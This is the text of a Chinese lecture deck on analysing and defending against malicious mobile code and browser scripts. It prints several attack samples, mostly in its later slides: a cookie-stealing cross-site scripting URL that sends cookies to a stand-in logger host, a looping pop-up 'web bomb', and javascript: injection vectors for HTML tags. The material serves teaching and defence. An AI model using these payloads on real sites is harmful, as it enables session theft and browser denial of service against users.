恶意软件（病毒）的分析与防范 Defence amp; analysis of malware教案.pptVIP

恶意软件（病毒）的分析与防范 Defence analysis of malware 计算机学院 傅建明 Fujms@ 恶意移动代码 移动代码是一种小型程序，它可从远程系统下载并以最小限度调用或以不许用户介入的形式在本地执行。 Java applet/Java Script/ Visual Basic Scripts/ActiveX 恶意移动代码是一种让你的系统违背你意愿工作的移动代码。 WSH WSH,利用脚本实现计算机工作的自动化 ,如管理文件/注册表/网络资源/系统的启动和关机等。 Example: dim newdir set newdir=wscript.createobject(scripting.filesystemobject) //com object for k=1 to 10 anewfolder=c:\chapter k newdir.createfolder(anewfolder) next WSH 一个脚本文件，后缀为 .VBS 或 .JS，然后在 Windows 下双击执行它，这时，系统就会自动调用一个适当的程序来对它进行解释并执行，而这个程序就是Windows Scripting Host，程序执行文件名为Wscript.exe （若是在命令行下，则为 Cscript.exe） Java语言 应用程序(Application)和小应用程序(Applet)：应用程序是可以独立运行的程序；而Applet不能独立运行，需要嵌入HTML文件,遵循一套约定 。 在WWW网页设计中加入动画、影像、音乐等，而要达到这些效果使用最多的是Java Applet和Java Script (这是一种Java的命令语言) ActiveX ActiveX是Microsoft提出的一组使用COM(Component Object Model，部件对象模型)使得软件部件在网络环境中进行交互的技术。(OMG-CORBA/sun-J2EE) 在Applet中可以使用ActiveX技术，如直接嵌入ActiveX控制，或者以ActiveX技术为桥梁，将其它开发商提供的多种语言的程序对象集成到Java中。 浏览器脚本 1 script type=text/javascript function do_something() { // code for this function would go here } /script 2 script type=text/javascript“ src=“myscript.js” 浏览器脚本 资源枯竭 浏览器劫持 利用浏览器漏洞窃取Cookie值 跨站脚本攻击 scriptalert(document.cookie)/script 资源枯竭(网页炸弹) ＜img src=*******:location=网址文件名.htm;＞ ＜img src=“http://恐怖图片的连接地址”width=“1”height=“******************(很大的数字)”＞ 资源枯竭(网页炸弹) 1 script type=text/javascript Function exploit(){ While(1) { showModelessDialog(“exploit.html”); } /script 资源枯竭(网页炸弹) 资源枯竭(网页炸弹) 资源枯竭(网页炸弹) 资源枯竭(网页炸弹) 浏览器劫持 脚本支持以下功能 与网页的其他成分交互 访问URL信息 打开新的窗口 四处拖动窗口 浏览器劫持：恶意脚本会滥用这些特权，它们会打开过多的窗口、使用户访问有害的站点、非法增加书签，甚至监控受害者的浏览活动。 Lettergo.htm(show) testjack.htm(show) 跨站脚本攻击 http://website.tld/program.cgi?input=scriptdocument.location=’http://yoursite.tld /cgi-bin/evil_cookie_logger.cgi?’+document.cookie/script 把脚本引入HTML ((a href=javas#99;ript#35;[code])) ((div onmouseover=[code])) ((img src=javascript:[code])) ((img dynsrc=javascript:[code])) [IE] ((input type=image dynsrc=javascript:[code])) [IE] ((bgsound src=javascript:[code])) [IE]